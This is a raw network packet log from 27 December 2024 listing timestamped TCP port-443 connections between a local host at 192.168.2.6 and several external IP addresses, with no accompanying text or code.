                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.080574036 CET44350050188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.373610973 CET50051443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.373640060 CET44350051162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.373691082 CET50051443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.377198935 CET50052443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.377242088 CET44350052162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.377371073 CET50052443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.377990961 CET50053443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.378025055 CET44350053162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.378084898 CET50053443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.380362034 CET50051443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.380378962 CET44350051162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.380567074 CET50052443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.380579948 CET44350052162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.389090061 CET50053443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.389103889 CET44350053162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.470158100 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.470604897 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.470613003 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.471126080 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.471147060 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.471187115 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.471194029 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.471220970 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.471241951 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.472151995 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.473403931 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.473490000 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.473683119 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.473690987 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.624973059 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.860755920 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.860827923 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.861258984 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.861264944 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863188028 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863193035 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863233089 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863248110 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863259077 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863264084 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863317966 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863322020 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863392115 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863404989 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863431931 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863440037 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863451004 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863456011 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863507032 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863512993 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863558054 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863571882 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863610983 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863619089 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863620996 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863625050 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863636971 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863646984 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863687038 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863694906 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863709927 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863720894 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863776922 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863785982 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863794088 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863799095 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863810062 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863817930 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863857985 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863869905 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863899946 CET50042443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.863909960 CET44350042188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.899633884 CET50058443192.168.2.62.16.158.176
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.899663925 CET443500582.16.158.176192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.899815083 CET50058443192.168.2.62.16.158.176
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.901298046 CET50058443192.168.2.62.16.158.176
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:11.901312113 CET443500582.16.158.176192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.066159964 CET50066443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.066184998 CET4435006618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.066231012 CET50066443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.066509008 CET50066443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.066521883 CET4435006618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.102978945 CET50068443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.103005886 CET44350068162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.103092909 CET50068443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.103331089 CET50068443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.103343010 CET44350068162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121023893 CET50069443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121052980 CET44350069162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121119976 CET50069443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121444941 CET50070443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121455908 CET44350070162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121532917 CET50070443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121809006 CET50070443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.121818066 CET44350070162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.122124910 CET50069443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.122143030 CET44350069162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.138792992 CET443500432.16.158.83192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.139027119 CET50043443192.168.2.62.16.158.83
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.139049053 CET443500432.16.158.83192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.140075922 CET443500432.16.158.83192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.140146971 CET50043443192.168.2.62.16.158.83
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.143480062 CET50043443192.168.2.62.16.158.83
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.143546104 CET443500432.16.158.83192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.148444891 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.151293039 CET50053443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.151421070 CET50070443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.151771069 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.151797056 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.151932955 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152255058 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152296066 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152348995 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152375937 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152559996 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.152570009 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.155240059 CET50052443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.155354977 CET50069443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.156456947 CET50066443192.168.2.618.165.220.66
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.156622887 CET50043443192.168.2.62.16.158.83
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.156639099 CET443500432.16.158.83192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.156721115 CET50043443192.168.2.62.16.158.83
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.156733036 CET50058443192.168.2.62.16.158.176
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158006907 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158015966 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158057928 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158392906 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158410072 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.158503056 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.159565926 CET50051443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.159622908 CET50068443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.159849882 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.159856081 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.159931898 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160037041 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160048962 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160149097 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160528898 CET50072443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160547018 CET44350072162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160638094 CET50071443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.160650969 CET44350071162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.161215067 CET50078443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.161225080 CET44350078162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.161346912 CET50079443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.161361933 CET44350079162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.162010908 CET50084443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.162019968 CET44350084162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.162153006 CET50085443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.162166119 CET44350085162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.163983107 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.164072990 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.164079905 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.173594952 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.173693895 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.173702002 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.186676025 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.186729908 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.186737061 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.191333055 CET44350053162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199337959 CET44350052162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199342966 CET44350070162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199376106 CET4435006618.165.220.66192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199750900 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199904919 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.199913979 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.203336000 CET44350069162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.203336000 CET44350068162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.203339100 CET443500582.16.158.176192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.203355074 CET44350051162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.213349104 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.213433981 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.213447094 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.272027969 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.272084951 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.272094965 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.280354977 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.280410051 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.280417919 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.332976103 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.340157032 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.344851017 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.344923973 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.344933033 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.355389118 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.355447054 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.355456114 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.374567986 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.374640942 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.374649048 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.382863045 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.382914066 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.382921934 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.396179914 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.396224022 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.396231890 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.409926891 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.409972906 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.409981012 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.423532009 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.423706055 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.423722982 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.437047958 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.437263966 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.437274933 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.449945927 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.450676918 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.450685024 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.461426020 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.463536024 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.463598967 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.463607073 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.464109898 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.473261118 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.485181093 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.485291958 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.485300064 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.496834040 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.497201920 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.497209072 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.521579981 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.521945000 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.521953106 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.525793076 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.525825024 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.525882006 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.525888920 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.525980949 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.534274101 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.542160034 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.542221069 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.542227983 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.549904108 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.549978018 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.549985886 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.557526112 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.557620049 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.557626009 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.565077066 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.565125942 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.565131903 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.572452068 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.572501898 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.572509050 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.579340935 CET44350050188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.579427958 CET50050443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.580060005 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.580097914 CET50050443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.580105066 CET44350050188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.580121994 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.580149889 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.580157995 CET44350039142.250.181.65192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.580506086 CET50039443192.168.2.6142.250.181.65
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.582463026 CET50050443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.582468987 CET44350050188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.582624912 CET50050443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.582643032 CET44350050188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.582720041 CET50050443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.582736969 CET44350050188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.582750082 CET50050443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.582758904 CET44350050188.245.216.205192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.582894087 CET50050443192.168.2.6188.245.216.205
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:11:12.582910061 CET44350050188.245.216.205192.168.2.6
